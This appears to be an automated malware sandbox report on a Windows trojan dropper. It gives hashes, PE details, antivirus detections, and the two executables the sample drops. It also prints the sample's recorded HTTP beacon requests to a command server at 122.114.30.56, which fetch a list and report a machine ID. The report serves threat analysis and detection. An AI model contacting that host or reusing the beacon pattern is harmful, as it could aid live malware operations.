Analysis Task

Analysis type | VM tag | Start time | End time | Duration
File (Windows) | win7-sp1-x64-shaapp01-1 | 2017-12-15 19:21:43 | 2017-12-15 19:24:00 | 137 seconds

Maldun Score

10.0

Amvbfzlb virus

File Details

File name test.exe
File size 1388544 bytes
File type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 8e14ddfbb97114a680aa43b1776efb49
SHA1 6c5ca6ddb5847463ca4e7ba01e49700050394688
SHA256 4d3e1c58cb911662c52300a2f212d02096b02616a68fb35da3c09e34c30b27ec
SHA512 76b5d6882d6295ac9bee10214753b5bbb5626b9b3083e434d4fef3375bc088a0556e63ac0558bdcc6ebe8e1dbd011d7ae2156f3c6e9372d23b07d302ee43678a
CRC32 6561A158
Ssdeep 24576:u0RCr0f4lZnHMvZxavQjJkmHiiEcwGDDepTT64cz:u0UhMhxDFhwGDSp/64cz


Hosts Contacted

Direct IP | Security rating | Geolocation
122.114.30.56 | Unknown | China

DNS Resolution

No domain information.



PE Information

Image base 0x00400000
Entry point 0x00401238
Declared checksum 0x00159ec4
Actual checksum 0x00159ec4
Minimum OS version 4.0
Compile time 2017-12-10 22:38:24
Import hash d92864a8239cd2e8117fef53396d4c0c
Icon exact hash 8b67acc8289ad787f14ef265c8098b91
Icon similarity hash 610ab0f829ac7b08395f2013f94801da

Version Information

Translation
InternalName
FileVersion
CompanyName
ProductName
ProductVersion
OriginalFilename

PE Sections

Name | Virtual address | Virtual size | Raw data size | Characteristics | Entropy
.text | 0x00001000 | 0x00001588 | 0x00002000 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 4.09
.data | 0x00003000 | 0x00000300 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 0.00
.rsrc | 0x00004000 | 0x0014eb2c | 0x0014f000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 6.50

Resources

Name | Offset | Size | Language | Sublanguage | Entropy | File type
CUSTOM | 0x0000492c | 0x0002b000 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 5.55 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
CUSTOM | 0x0000492c | 0x0002b000 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 5.55 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
RT_ICON | 0x000043ec | 0x00000128 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 2.07 | GLS_BINARY_LSB_FIRST
RT_ICON | 0x000043ec | 0x00000128 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 2.07 | GLS_BINARY_LSB_FIRST
RT_ICON | 0x000043ec | 0x00000128 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 2.07 | GLS_BINARY_LSB_FIRST
RT_GROUP_ICON | 0x000043bc | 0x00000030 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 2.98 | MS Windows icon resource - 3 icons, 32x32, 2 colors
RT_VERSION | 0x000041d0 | 0x000001ec | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.35 | data

Imports

Library: MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaAryMove
0x40100c __vbaFreeVar
0x401010 __vbaFreeVarList
0x401014 _adj_fdiv_m64
0x401018 _adj_fprem1
0x40101c __vbaStrCat
0x401020 __vbaSetSystemError
0x401028 _adj_fdiv_m32
0x40102c __vbaAryDestruct
0x401030 __vbaExitProc
0x401034 __vbaOnError
0x401038 __vbaObjSet
0x40103c None
0x401040 _adj_fdiv_m16i
0x401044 _adj_fdivr_m16i
0x401048 _CIsin
0x40104c __vbaChkstk
0x401050 __vbaFileClose
0x401054 None
0x401058 __vbaPutOwner3
0x40105c DllFunctionCall
0x401060 _adj_fpatan
0x401064 None
0x401068 _CIsqrt
0x40106c __vbaExceptHandler
0x401070 _adj_fprem
0x401074 _adj_fdivr_m64
0x401078 None
0x40107c __vbaFPException
0x401080 __vbaVarCat
0x401084 _CIlog
0x401088 __vbaFileOpen
0x40108c __vbaNew2
0x401090 __vbaVar2Vec
0x401094 _adj_fdiv_m32i
0x401098 _adj_fdivr_m32i
0x40109c _adj_fdivr_m32
0x4010a0 _adj_fdiv_r
0x4010a4 None
0x4010a8 None
0x4010ac __vbaFpI4
0x4010b0 _CIatan
0x4010b4 __vbaStrMove
0x4010b8 _allmul
0x4010bc None
0x4010c0 _CItan
0x4010c4 _CIexp
0x4010c8 __vbaFreeStr
0x4010cc __vbaFreeObj

Antivirus Scan Results

Antivirus engine/vendor | Detection name / rule match | Signature database date
Bkav | No detection | 20171214
MicroWorld-eScan | Gen:Trojan.Heur.Dropper.un0@amVbFZlb | 20171215
nProtect | No detection | 20171215
CMC | No detection | 20171215
CAT-QuickHeal | No detection | 20171215
McAfee | Artemis!8E14DDFBB971 | 20171215
Cylance | Unsafe | 20171215
Zillya | No detection | 20171214
SUPERAntiSpyware | No detection | 20171215
TheHacker | No detection | 20171210
K7GW | Trojan ( 003d23081 ) | 20171214
K7AntiVirus | Trojan ( 003d23081 ) | 20171215
Arcabit | Trojan.Heur.Dropper.EA6E9A | 20171215
TrendMicro | No detection | 20171215
Baidu | Win32.Trojan.WisdomEyes.16070401.9500.9989 | 20171215
Cyren | W32/GenBl.8E14DDFB!Olympus | 20171215
Symantec | No detection | 20171215
ESET-NOD32 | No detection | 20171215
Paloalto | generic.ml | 20171215
ClamAV | No detection | 20171215
Kaspersky | No detection | 20171215
BitDefender | Gen:Trojan.Heur.Dropper.un0@amVbFZlb | 20171215
NANO-Antivirus | Virus.Win32.Gen.ccmw | 20171215
AegisLab | Gen.Troj.Heur!c | 20171215
Rising | No detection | 20171215
Ad-Aware | Gen:Trojan.Heur.Dropper.un0@amVbFZlb | 20171215
Emsisoft | Gen:Trojan.Heur.Dropper.un0@amVbFZlb (B) | 20171215
Comodo | No detection | 20171215
F-Secure | Gen:Trojan.Heur.Dropper.un0@amVbFZlb | 20171215
DrWeb | Trojan.KillFiles.29194 | 20171215
VIPRE | Trojan.Win32.Generic!BT | 20171215
Invincea | heuristic | 20170914
McAfee-GW-Edition | BehavesLike.Win32.Rontokbro.th | 20171215
Sophos | No detection | 20171215
Ikarus | Backdoor.Win32.Hupigon | 20171214
F-Prot | No detection | 20171215
Jiangmin | No detection | 20171215
Webroot | No detection | 20171215
Avira | TR/Dropper.Gen | 20171215
Antiy-AVL | No detection | 20171215
Kingsoft | No detection | 20171215
Microsoft | No detection | 20171214
Endgame | malicious (high confidence) | 20171130
ViRobot | No detection | 20171215
ZoneAlarm | No detection | 20171215
Avast-Mobile | No detection | 20171215
GData | Gen:Trojan.Heur.Dropper.un0@amVbFZlb | 20171215
AhnLab-V3 | No detection | 20171215
ALYac | No detection | 20171215
AVware | Trojan.Win32.Generic!BT | 20171215
MAX | malware (ai score=88) | 20171215
VBA32 | No detection | 20171214
Malwarebytes | No detection | 20171215
WhiteArmor | No detection | 20171204
Panda | No detection | 20171214
Zoner | No detection | 20171215
Tencent | Win32.Trojan.Dropper.Ebgu | 20171215
Yandex | No detection | 20171214
SentinelOne | No detection | 20171207
eGambit | No detection | 20171215
Fortinet | No detection | 20171215
AVG | FileRepMalware | 20171215
Cybereason | malicious.1b8fb7 | 20171103
Avast | FileRepMalware | 20171215
CrowdStrike | malicious_confidence_100% (W) | 20171016
Qihoo-360 | No detection | 20171215

Process Tree

test.exe, PID: 2032, parent PID: 300
123.exe, PID: 272, parent PID: 2032


TCP

Source address | Source port | Destination address | Destination port
192.168.122.201 | 49162 | 122.114.30.56 | 5

UDP

No UDP connection records.


HTTP Requests

URI | HTTP data
http://122.114.30.56:5/sb/list.txt
GET /sb/list.txt HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Host: 122.114.30.56:5

http://122.114.30.56:5/sb/id.asp?id=49656E690000000D0F8BFBFF1FBA2223
GET /sb/id.asp?id=49656E690000000D0F8BFBFF1FBA2223 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Host: 122.114.30.56:5

SMTP Traffic

No SMTP traffic.

IRC Traffic

No IRC requests.

ICMP Traffic

No ICMP traffic.

CIF Report

No CIF results

Network Alerts

No alerts

TLS

No TLS

Suricata HTTP

No Suricata HTTP

No files extracted from network traffic

Dropped Files

File name 落叶的忧伤.dll
Associated files
C:\Users\test\AppData\Local\Temp\落叶的忧伤.dll
File size 176128 bytes
File type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 a1572aa30ca960c26086fa33ce805cd6
SHA1 407c7d69695189cdccd9c302aab193dbbdb40f2b
SHA256 59b73c07a60734ffddbfd99d56d238a4c389bb01ad87c69c76e9ca4d83c6872d
CRC32 937E4EA9
Ssdeep 1536:dtbFuRksd2wNfydHTG+00t+rm54oPQ4PygTGDIcADX0IEZ/HtkwAOCsXU+U0WwRe:LbFuOsdFWp0Z7AL0IcPtV7CsXSuRj

File name 123.exe
Associated files
C:\Users\test\AppData\Local\Temp\123.exe
File size 1192448 bytes
File type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 8cd1a5bfe4b1ff66f492a4e486cec9a8
SHA1 890208385b4baecb8fd61bdf9c401dd06d8b1345
SHA256 eca67026be257fa1c5fc8ee1ca34d8913f51cb81a175d56ec9608764a6379397
CRC32 348C870B
Ssdeep 24576:E0f4lZnHMvZxavQjJkmHiiEcwGDDepTT64cz:EhMhxDFhwGDSp/64cz

No similar analyses found.

Processing ( 25.746 seconds )

  • 10.419 NetworkAnalysis
  • 8.553 Suricata
  • 1.969 TargetInfo
  • 1.662 Static
  • 1.417 BehaviorAnalysis
  • 1.234 VirusTotal
  • 0.398 peid
  • 0.064 Dropped
  • 0.011 Strings
  • 0.01 AnalysisInfo
  • 0.004 Debug
  • 0.003 config_decoder
  • 0.002 Memory

Signatures ( 1.801 seconds )

  • 1.389 md_url_bl
  • 0.086 stealth_timeout
  • 0.083 api_spamming
  • 0.054 decoy_document
  • 0.043 antidbg_windows
  • 0.026 antiav_detectreg
  • 0.01 infostealer_ftp
  • 0.008 antivm_vbox_window
  • 0.006 persistence_autorun
  • 0.006 antiav_detectfile
  • 0.006 infostealer_im
  • 0.006 md_bad_drop
  • 0.005 antiemu_wine_func
  • 0.005 antisandbox_script_timer
  • 0.005 antianalysis_detectreg
  • 0.005 geodo_banking_trojan
  • 0.005 md_domain_bl
  • 0.004 kovter_behavior
  • 0.004 infostealer_bitcoin
  • 0.004 infostealer_mail
  • 0.004 ransomware_files
  • 0.003 infostealer_browser_password
  • 0.003 antivm_vbox_files
  • 0.003 disables_browser_warn
  • 0.003 ransomware_extensions
  • 0.002 rat_nanocore
  • 0.002 tinba_behavior
  • 0.002 browser_security
  • 0.001 antivm_generic_services
  • 0.001 betabot_behavior
  • 0.001 antivm_vbox_libs
  • 0.001 kibex_behavior
  • 0.001 antivm_generic_scsi
  • 0.001 shifu_behavior
  • 0.001 antivm_generic_disk
  • 0.001 ursnif_behavior
  • 0.001 cerber_behavior
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_xen_keys
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 network_http

Reporting ( 0.674 seconds )

  • 0.594 ReportHTMLSummary
  • 0.08 Malheur

Task ID 122632
Mongo ID 5a33b0eebb7d5720df12a1d5
Cuckoo release 1.4-Maldun